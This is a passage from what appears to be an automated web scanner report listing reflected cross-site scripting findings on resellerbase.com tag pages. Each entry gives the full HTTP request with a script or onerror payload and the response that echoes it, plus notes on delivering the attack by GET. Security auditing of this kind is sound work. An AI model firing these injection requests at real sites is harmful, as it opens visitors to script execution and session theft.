Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagba124<script>alert(1)</script>79acad5a1355c8164/private+label?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagba124<script>alert(1)</script>79acad5a1355c8164/private+label?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4334. http://www.resellerbase.com/tag/private+label [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/private+label

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 77893<script>alert(1)</script>0ac08bb9610 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag77893<script>alert(1)</script>0ac08bb9610/private+label HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag77893<script>alert(1)</script>0ac08bb9610/private+label was not found on this server.</p>
...[SNIP]...

2.4335. http://www.resellerbase.com/tag/private+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28eb0<img%20src%3da%20onerror%3dalert(1)>1b100bcf959f561c9 was submitted in the REST URL parameter 2. This input was echoed as 28eb0<img src=a onerror=alert(1)>1b100bcf959f561c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/private+label28eb0<img%20src%3da%20onerror%3dalert(1)>1b100bcf959f561c9?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: priva
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : private label28eb0<img src=a onerror=alert(1)>1b100bcf959f561c9]</td>
...[SNIP]...

2.4336. http://www.resellerbase.com/tag/private+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e17aa</title><img%20src%3da%20onerror%3dalert(1)>8c1a738d790 was submitted in the REST URL parameter 2. This input was echoed as e17aa</title><img src=a onerror=alert(1)>8c1a738d790 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/private+labele17aa</title><img%20src%3da%20onerror%3dalert(1)>8c1a738d790 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: private labele17aa</title><img src=a onerror=alert(1)>8c1a738d790</title>
...[SNIP]...

2.4337. http://www.resellerbase.com/tag/private+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 8ae0b</title><img%20src%3da%20onerror%3dalert(1)>304efea908c16f9a was submitted in the REST URL parameter 2. This input was echoed as 8ae0b</title><img src=a onerror=alert(1)>304efea908c16f9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/private+label8ae0b</title><img%20src%3da%20onerror%3dalert(1)>304efea908c16f9a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/private+label
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: private label8ae0b</title><img src=a onerror=alert(1)>304efea908c16f9a</title>
...[SNIP]...

2.4338. http://www.resellerbase.com/tag/private+label [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/private+label

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6c5c2<img%20src%3da%20onerror%3dalert(1)>d22d5607f9e was submitted in the REST URL parameter 2. This input was echoed as 6c5c2<img src=a onerror=alert(1)>d22d5607f9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/private+label6c5c2<img%20src%3da%20onerror%3dalert(1)>d22d5607f9e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:00:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: priva
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : private label6c5c2<img src=a onerror=alert(1)>d22d5607f9e]</td>
...[SNIP]...

2.4339. http://www.resellerbase.com/tag/resel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1cf61<script>alert(1)</script>9b614158e5ea3f64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag1cf61<script>alert(1)</script>9b614158e5ea3f64/resel?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag1cf61<script>alert(1)</script>9b614158e5ea3f64/resel?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4340. http://www.resellerbase.com/tag/resel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resel

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 20a72<script>alert(1)</script>48c580269cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag20a72<script>alert(1)</script>48c580269cb/resel HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag20a72<script>alert(1)</script>48c580269cb/resel was not found on this server.</p>
...[SNIP]...

2.4341. http://www.resellerbase.com/tag/resel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload bfa6f</title><img%20src%3da%20onerror%3dalert(1)>65a9a863140224bba was submitted in the REST URL parameter 2. This input was echoed as bfa6f</title><img src=a onerror=alert(1)>65a9a863140224bba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/reselbfa6f</title><img%20src%3da%20onerror%3dalert(1)>65a9a863140224bba?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reselbfa6f</title><img src=a onerror=alert(1)>65a9a863140224bba</title>
...[SNIP]...

2.4342. http://www.resellerbase.com/tag/resel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dd9a0<img%20src%3da%20onerror%3dalert(1)>46526dee74f was submitted in the REST URL parameter 2. This input was echoed as dd9a0<img src=a onerror=alert(1)>46526dee74f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reseldd9a0<img%20src%3da%20onerror%3dalert(1)>46526dee74f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : reseldd9a0<img src=a onerror=alert(1)>46526dee74f]</td>
...[SNIP]...

2.4343. http://www.resellerbase.com/tag/resel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b60fd</title><img%20src%3da%20onerror%3dalert(1)>b11f0214e87 was submitted in the REST URL parameter 2. This input was echoed as b60fd</title><img src=a onerror=alert(1)>b11f0214e87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/reselb60fd</title><img%20src%3da%20onerror%3dalert(1)>b11f0214e87 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: reselb60fd</title><img src=a onerror=alert(1)>b11f0214e87</title>
...[SNIP]...

2.4344. http://www.resellerbase.com/tag/resel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resel

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91fc7<img%20src%3da%20onerror%3dalert(1)>5c0b545028827c1d0 was submitted in the REST URL parameter 2. This input was echoed as 91fc7<img src=a onerror=alert(1)>5c0b545028827c1d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/resel91fc7<img%20src%3da%20onerror%3dalert(1)>5c0b545028827c1d0?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resel
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resel91fc7<img src=a onerror=alert(1)>5c0b545028827c1d0]</td>
...[SNIP]...

2.4345. http://www.resellerbase.com/tag/resell [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resell

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c248<script>alert(1)</script>376bceaa549f58cde was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag4c248<script>alert(1)</script>376bceaa549f58cde/resell?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:00:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4c248<script>alert(1)</script>376bceaa549f58cde/resell?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4346. http://www.resellerbase.com/tag/resell [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resell

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3ff09<script>alert(1)</script>3b7a0f1f516 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag3ff09<script>alert(1)</script>3b7a0f1f516/resell HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag3ff09<script>alert(1)</script>3b7a0f1f516/resell was not found on this server.</p>
...[SNIP]...

2.4347. http://www.resellerbase.com/tag/resell [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3169b<img%20src%3da%20onerror%3dalert(1)>e2939cd366 was submitted in the REST URL parameter 2. This input was echoed as 3169b<img src=a onerror=alert(1)>e2939cd366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resell3169b<img%20src%3da%20onerror%3dalert(1)>e2939cd366 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resel
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : resell3169b<img src=a onerror=alert(1)>e2939cd366]</td>
...[SNIP]...

2.4348. http://www.resellerbase.com/tag/resell [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3d4e8</title><img%20src%3da%20onerror%3dalert(1)>95efad5ded5 was submitted in the REST URL parameter 2. This input was echoed as 3d4e8</title><img src=a onerror=alert(1)>95efad5ded5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/resell3d4e8</title><img%20src%3da%20onerror%3dalert(1)>95efad5ded5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resell3d4e8</title><img src=a onerror=alert(1)>95efad5ded5</title>
...[SNIP]...

2.4349. http://www.resellerbase.com/tag/resell [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3c3b1</title><img%20src%3da%20onerror%3dalert(1)>9aa0a5c5c920ba23 was submitted in the REST URL parameter 2. This input was echoed as 3c3b1</title><img src=a onerror=alert(1)>9aa0a5c5c920ba23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /tag/resell3c3b1</title><img%20src%3da%20onerror%3dalert(1)>9aa0a5c5c920ba23?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/resell
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: resell3c3b1</title><img src=a onerror=alert(1)>9aa0a5c5c920ba23</title>
...[SNIP]...

2.4350. http://www.resellerbase.com/tag/resell [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/resell

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f7f2<img%20src%3da%20onerror%3dalert(1)>39fc79e449cf59919 was submitted in the REST URL parameter 2. This input was echoed as 8f7f2<img src=a onerror=alert(1)>39fc79e449cf59919 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which makes the attack easier to demonstrate and deliver.

Request

